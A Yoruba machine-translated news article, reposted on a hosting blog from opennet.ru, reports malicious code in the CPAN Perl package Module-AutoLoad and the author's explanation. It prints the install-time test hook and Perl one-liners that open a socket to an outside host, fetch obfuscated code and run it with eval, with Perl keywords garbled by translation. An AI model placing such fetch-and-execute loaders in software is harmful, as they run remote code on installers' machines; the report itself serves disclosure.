ProHoster > Блог > ayelujara iroyin > Koodu irira ti a rii ni Module-AutoLoad Perl package

Koodu irira ti a rii ni Module-AutoLoad Perl package

Ninu package Perl ti a pin nipasẹ ilana CPAN Module-AutoLoad, ti a ṣe lati gbe awọn modulu CPAN laifọwọyi lori fifo, mọ koodu irira. Awọn irira ifibọ wà ri ninu koodu idanwo 05_rcx.t, eyiti o ti wa ni gbigbe lati ọdun 2011.
O jẹ akiyesi pe awọn ibeere nipa ikojọpọ koodu ibeere dide lori Stackoverflow pada ni 2016.

Iṣẹ irira ṣan silẹ si igbiyanju lati ṣe igbasilẹ ati ṣiṣẹ koodu lati ọdọ olupin ẹni-kẹta (http://r.cx: 1/) lakoko ipaniyan ti suite idanwo kan ti a ṣe ifilọlẹ nigbati o ba fi module naa sori ẹrọ. O ti ro pe koodu ti a gbasilẹ lakoko lati olupin ita ko jẹ irira, ṣugbọn ni bayi ibeere naa ti darí si aaye ww.limera1n.com, eyiti o pese ipin ti koodu naa fun ipaniyan.

Lati ṣeto igbasilẹ ni faili kan 05_rcx.t Awọn koodu atẹle ni a lo:

$prog mi = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mi $gbiyanju = `$^X $prog`;

Awọn pàtó koodu fa awọn iwe afọwọkọ lati wa ni ṣiṣẹ ../contrib/RCX.pl, awọn akoonu inu eyiti o dinku si laini:

lo lib do{eval<$b>&&botstrap("RCX") if$b=IO tuntun::Socket::INET 82.46.99.88.":1″};

Yi akosile èyà dapo lilo iṣẹ naa perlobfuscator.com koodu lati ita agbalejo r.cx (awọn koodu kikọ 82.46.99.88 badọgba lati awọn ọrọ "R.cX") ati ki o ṣiṣẹ o ni eval Àkọsílẹ.

$ perl -MIO:: Socket -e'$b = IO tuntun :: Socket :: INET 82.46.99.88.":1″; titẹ <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Lẹhin ṣiṣi silẹ, atẹle naa jẹ ṣiṣe nikẹhin: koodu:

tẹjade {$b=IO tuntun :: Socket :: INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor pada kilo $@nigbati$b;1

Apo iṣoro naa ti yọkuro ni bayi lati ibi ipamọ naa. Bireki (Perl Authors Po si Server), ati awọn module onkowe ká iroyin ti dina. Ni idi eyi, module si tun wa wa ninu iwe ipamọ MetaCPAN ati pe o le fi sii taara lati MetaCPAN ni lilo diẹ ninu awọn ohun elo bii cpanminus. O ti ṣe akiyesiwipe package ti a ko ni opolopo pin.

Awon lati jiroro ti sopọ ati onkowe ti module, ti o sẹ alaye ti a ti fi koodu irira sii lẹhin ti aaye rẹ "r.cx" ti gepa ati salaye pe o kan ni igbadun, o si lo perlobfuscator.com kii ṣe lati tọju ohun kan, ṣugbọn lati dinku iwọn naa. ti koodu ati irọrun didakọ rẹ nipasẹ agekuru agekuru. Yiyan orukọ iṣẹ naa “botstrap” jẹ alaye nipasẹ otitọ pe ọrọ yii “dun bi bot ati pe o kuru ju bootstrap.” Onkọwe ti module naa tun ṣe idaniloju pe awọn ifọwọyi ti a mọ ko ṣe awọn iṣe irira, ṣugbọn ṣe afihan ikojọpọ ati ipaniyan koodu nipasẹ TCP.

orisun: opennet.ru

Fi ọrọìwòye kun